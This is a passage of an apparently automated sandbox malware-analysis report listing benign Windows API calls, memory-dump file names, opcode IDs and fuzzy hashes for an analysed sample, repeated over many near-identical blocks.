              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: bc2f49225fe0dc96281ea7e9e4df728bc08d7767f238151357cd7984b86ef3d1
              • Instruction ID: acf7c78bd70d196ad407070e25c3da736c0dafc740a34d45bf719c858d7206de
              • Opcode Fuzzy Hash: bc2f49225fe0dc96281ea7e9e4df728bc08d7767f238151357cd7984b86ef3d1
              • Instruction Fuzzy Hash: 84D01231011140968F2566345D091B977D1DF83366B7CC7E8D025C50B1D723C803F641
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B9D43F
                • Part of subcall function 00B9AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9AC85
                • Part of subcall function 00B9AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9AC96
                • Part of subcall function 00B9AC74: IsDialogMessageW.USER32(00010442,?), ref: 00B9ACAA
                • Part of subcall function 00B9AC74: TranslateMessage.USER32(?), ref: 00B9ACB8
                • Part of subcall function 00B9AC74: DispatchMessageW.USER32(?), ref: 00B9ACC2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: f53cdaee93219ecb9d27afc04a87650ccddc5d7c28ad42228b22055b7399f29b
              • Instruction ID: 9ead5b54a804dcb953bc099dba3cb4b37a0727728dce1c7bd27dd7b789b31007
              • Opcode Fuzzy Hash: f53cdaee93219ecb9d27afc04a87650ccddc5d7c28ad42228b22055b7399f29b
              • Instruction Fuzzy Hash: 22D09E31144300BBDA152B51CE06F1F7AF6AB88B04F004594B344750B18A72AD20DB16
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 829c7c1f8f0d2889e68e2d474f8fb0aed834b69a33f76280c5ed322f6136cce2
              • Instruction ID: b84ce0e8df38f65261f1ec93f20955b33cdcf3dc5aa1ebcf8aace9d5631096b5
              • Opcode Fuzzy Hash: 829c7c1f8f0d2889e68e2d474f8fb0aed834b69a33f76280c5ed322f6136cce2
              • Instruction Fuzzy Hash: 83B012922AC0016D35086607AC83F3602CCC4C1B10330C0FAB409E01C2D5C05C090432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1ade8ae0ad4b189c70447eb1d312dccc83fde374d9858d91d0ff11d8ee37e826
              • Instruction ID: cfe43fa44e98478dd7acef62b8514af8b8040d37b9359d990d823ddf90abb6ce
              • Opcode Fuzzy Hash: 1ade8ae0ad4b189c70447eb1d312dccc83fde374d9858d91d0ff11d8ee37e826
              • Instruction Fuzzy Hash: 25B0129626C101AD35086207ADC3F3B02CCD4C0B1033040FEB009E00C2D5C05C040532
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 646ce9bdffb78036bdb721b6d0574811fb3fbc4e81e7fe9f2afee46f5888714a
              • Instruction ID: 2597a243578677318b041f732969a4ea102769c4cc8c6f1b7d8fb18216f424b8
              • Opcode Fuzzy Hash: 646ce9bdffb78036bdb721b6d0574811fb3fbc4e81e7fe9f2afee46f5888714a
              • Instruction Fuzzy Hash: C8B0129626C3017D39082203ADD3F3B02CCC4C0B1033045FAB009F00D2D5C05C484432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f97cbb1fb259426bc7d19e37d7b039cd29f30de6e45c55d47e16ca1a2184723b
              • Instruction ID: 830dd1af54c0e07d3d61d16dae3f166a66be8061c5537358a88797992886f84b
              • Opcode Fuzzy Hash: f97cbb1fb259426bc7d19e37d7b039cd29f30de6e45c55d47e16ca1a2184723b
              • Instruction Fuzzy Hash: 1FB012A226C0016D390C6207AC83F3602CCC4C0B1033040FEB00DE00D2D5C05D040432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d3d7a216dcdcc1e9144376fa4885d2e6dd56b49b8331139481f7821f903c79f5
              • Instruction ID: 6543b0f661f6ae8f2f828fc2a5179e73f0b5afa0af1de78fa667f86383bbff14
              • Opcode Fuzzy Hash: d3d7a216dcdcc1e9144376fa4885d2e6dd56b49b8331139481f7821f903c79f5
              • Instruction Fuzzy Hash: 54B012A226C0016D390C6207AD83F3602CCC4C0B1033040FAB00DE00D2D9C05E050432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a378b701272b46617c0e8586e09e26da7dcbc6206de5c7c8f14c0cbecb28b357
              • Instruction ID: 05490d814eea271242c0e4f6397ec1e3b921d32cbc1972f7409a4a2043623f8f
              • Opcode Fuzzy Hash: a378b701272b46617c0e8586e09e26da7dcbc6206de5c7c8f14c0cbecb28b357
              • Instruction Fuzzy Hash: 11B012A226C1016D39486207AC83F3602CCC4C0B1033041FAB00DE00D2D5C05D440432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b2fefae09945a1026a43d4917ff5d8d50b362f90cdc78f5f541cc35f88e836d8
              • Instruction ID: 0e787e6345a465b067a693d8fd29c84911fee9f7e0032d9030488fce2fb5f65d
              • Opcode Fuzzy Hash: b2fefae09945a1026a43d4917ff5d8d50b362f90cdc78f5f541cc35f88e836d8
              • Instruction Fuzzy Hash: 89B012A226C0016D39086207AC83F3602CCC4C1B1033080FAB40DE00D2D5C05D040432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a6bd9eefdeedc92c4018de7504b841c5cb226eb43095f579dee66b77474022ef
              • Instruction ID: 3e5dd8e56a8f562aa8185fab097078147fb22d09a60ed665b8180693c64fe753
              • Opcode Fuzzy Hash: a6bd9eefdeedc92c4018de7504b841c5cb226eb43095f579dee66b77474022ef
              • Instruction Fuzzy Hash: 45B012922AC0016D350C6607AD83F3602CCC4C0B1033080FAB009E01C2D9C05D0E0432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1575ee9b7e12c636a600df8911b686e656fd7a294f8bc0fdd25701296cfb108c
              • Instruction ID: a4f48885472ed1323eb9e1ca6d721d2066005193c296d777d28ade1cdd90f0bf
              • Opcode Fuzzy Hash: 1575ee9b7e12c636a600df8911b686e656fd7a294f8bc0fdd25701296cfb108c
              • Instruction Fuzzy Hash: F1B012922AC1416D35486207BC83F3602CCC4C0B1033081FAB009E01C2D5C05C890432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E20B
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bc733540d8dedd06d18a087ae65697635ffeb0d32447b553167e38f188af08e3
              • Instruction ID: 9331bde4d9436485dc325daf31f66061695ca001dac1a78f8776a4e1cb6a0264
              • Opcode Fuzzy Hash: bc733540d8dedd06d18a087ae65697635ffeb0d32447b553167e38f188af08e3
              • Instruction Fuzzy Hash: D3B0129226E001BD360C57027D07D7603DCC4C0B6233084FAB115E40D29AC0DC058032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 00b8dd1157c72328332d4294af7b663e4697ffa03a1342d268ebdecc55119eef
              • Instruction ID: e01f93ebc1e751b3dea55b39f5a7a57791a7e67ea95050ad34f57bb88d0f57d5
              • Opcode Fuzzy Hash: 00b8dd1157c72328332d4294af7b663e4697ffa03a1342d268ebdecc55119eef
              • Instruction Fuzzy Hash: 83B0129326C0016D35086217AC83F3602CCC4C1B1033080FAB509E00C2D6C05C041432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0b67f09e69c8ffc218ded1527550d4ccefb80a2ed973efd65c93819b6d5e48d4
              • Instruction ID: b3117ec55b0adc3b6009ee6b0b50881ffa4df9a774c86301e1078bcb3045be2e
              • Opcode Fuzzy Hash: 0b67f09e69c8ffc218ded1527550d4ccefb80a2ed973efd65c93819b6d5e48d4
              • Instruction Fuzzy Hash: ABB0129227D0016D35086207AC83F3602CDC8C0B1133040FEB009E00C2D5C05C040432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a83fc59fb30bb00ae3857e4c969f329c305a41e9e2556dc1e918e4b8cf170659
              • Instruction ID: d95490674e4e38e6eaab804b92f1c4039401f7a0e08a11b64104536f34bee743
              • Opcode Fuzzy Hash: a83fc59fb30bb00ae3857e4c969f329c305a41e9e2556dc1e918e4b8cf170659
              • Instruction Fuzzy Hash: 5FB012A226D1016D35486307AC83F3A02CDC4C0B1133141FAB009E00C2D5C05C440432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 43aa6e380ee6860a5765ef8b6695898c98c447d547e4bdf970755c54b77b752f
              • Instruction ID: db82a170f79697e46de2a16afebc12595a215d2cde21542ba20a65013c4fd5c0
              • Opcode Fuzzy Hash: 43aa6e380ee6860a5765ef8b6695898c98c447d547e4bdf970755c54b77b752f
              • Instruction Fuzzy Hash: A7B0129226D0016D35086207AC83F3602CDC4C1B1133080FAB409E00C2D5C05C040432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9345f64c58e0211f7db3ef19c3903f139161a334e493717b67eb94d77053aece
              • Instruction ID: aa8b3972768ae6c1a5023522ba5ee9c023bb1a699e72e47b4d1abea2957f55b7
              • Opcode Fuzzy Hash: 9345f64c58e0211f7db3ef19c3903f139161a334e493717b67eb94d77053aece
              • Instruction Fuzzy Hash: 7EB012A326C001AD350C6207AD83F3602CCC4C0B1033040FAB009E00C2D9C05D051432
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
